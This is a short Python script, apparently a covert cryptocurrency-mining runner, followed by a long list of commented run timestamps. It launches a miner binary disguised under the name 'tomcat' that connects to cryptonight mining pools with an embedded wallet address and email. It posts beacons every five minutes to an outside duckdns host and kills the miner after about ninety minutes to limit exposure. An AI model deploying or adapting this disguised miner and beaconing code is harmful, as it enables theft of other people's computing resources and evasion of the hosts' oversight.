import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:04.032782
#2018-02-17 17:38:07.214749
#2018-02-17 19:26:01.591760
#2018-02-17 21:15:06.770364
#2018-02-17 22:59:05.197487
#2018-02-18 00:47:03.777157
#2018-02-18 02:34:05.384033
#2018-02-18 04:21:04.223603
#2018-02-18 06:12:05.226804
#2018-02-18 08:02:04.048757
#2018-02-18 09:50:08.317634
#2018-02-18 11:38:07.794919
#2018-02-18 13:23:05.864649
#2018-02-18 15:13:05.296776
#2018-02-18 17:02:04.656152
#2018-02-18 18:49:02.188169
#2018-02-18 20:35:05.257820
#2018-02-18 22:21:04.605389
#2018-02-19 00:10:04.973762
#2018-02-19 01:56:06.029078
#2018-02-19 03:43:04.356484
#2018-02-19 05:28:07.502886
#2018-02-19 07:15:09.346303
#2018-02-19 09:05:08.682536
#2018-02-19 10:53:06.984850
#2018-02-19 12:41:08.207401
#2018-02-19 14:28:08.432352
#2018-02-19 16:16:09.507468
#2018-02-19 18:04:05.797729
#2018-02-19 19:50:08.832045
#2018-02-19 21:38:01.312472
#2018-02-19 23:24:01.788109
#2018-02-20 01:10:04.239948
#2018-02-20 02:59:01.949190
#2018-02-20 04:46:06.514399
#2018-02-20 06:30:10.808792
#2018-02-20 08:15:07.901884
#2018-02-20 10:00:09.858946
#2018-02-20 11:44:01.266792
#2018-02-20 13:31:06.729151
#2018-02-20 15:14:09.569779
#2018-02-20 16:58:11.877833
#2018-02-20 18:48:05.342450
#2018-02-20 20:38:01.775118
#2018-02-20 22:22:05.687978
#2018-02-21 00:03:05.551680
#2018-02-21 01:50:04.942951
#2018-02-21 03:39:04.134567
#2018-02-21 05:27:01.542913
#2018-02-21 07:14:03.414007
#2018-02-21 08:59:07.984016
#2018-02-21 10:47:01.609984
#2018-02-21 12:35:01.448816
#2018-02-21 14:21:09.631758
#2018-02-21 16:08:08.351589
#2018-02-21 17:58:05.983182
#2018-02-21 19:43:04.883987
#2018-02-21 21:31:07.104373
#2018-02-21 23:16:05.886462
#2018-02-22 01:07:05.492431
#2018-02-22 02:54:08.273393
#2018-02-22 04:40:09.532288
#2018-02-22 06:24:07.310249
#2018-02-22 08:12:07.406880
#2018-02-22 09:59:07.106424
#2018-02-22 11:44:05.448634
#2018-02-22 13:30:10.216097
#2018-02-22 15:18:07.428124
#2018-02-22 17:04:09.497524
#2018-02-22 18:51:06.133529
#2018-02-22 20:44:04.440371
#2018-02-22 22:31:03.731939
#2018-02-23 00:17:03.910906
#2018-02-23 02:06:06.689913
#2018-02-23 03:56:08.031436
#2018-02-23 05:44:04.805013
#2018-02-23 07:33:04.812241
#2018-02-23 09:36:06.859234
#2018-02-23 11:41:01.210809
#2018-02-23 13:31:01.885963
#2018-02-23 15:17:04.962213
#2018-02-23 17:04:09.684016
#2018-02-23 18:52:09.619917
#2018-02-23 20:38:02.089931
#2018-02-23 22:25:04.218181
#2018-02-24 00:10:07.098279
#2018-02-24 02:03:06.446338
#2018-02-24 03:53:06.536715
#2018-02-24 05:40:09.969404
#2018-02-24 07:28:01.576134
#2018-02-24 09:15:09.749542
#2018-02-24 11:10:08.658480
#2018-02-24 12:58:06.901768
#2018-02-24 14:46:04.086168
#2018-02-24 16:38:03.962614
#2018-02-24 18:26:03.956828
#2018-02-24 20:12:06.481091
#2018-02-24 21:58:06.088325
#2018-02-25 00:58:05.096476
#2018-02-25 03:55:03.655711
#2018-02-25 06:40:04.905626
#2018-02-25 11:36:08.643798
#2018-02-25 13:29:01.805271
#2018-02-25 15:03:02.059010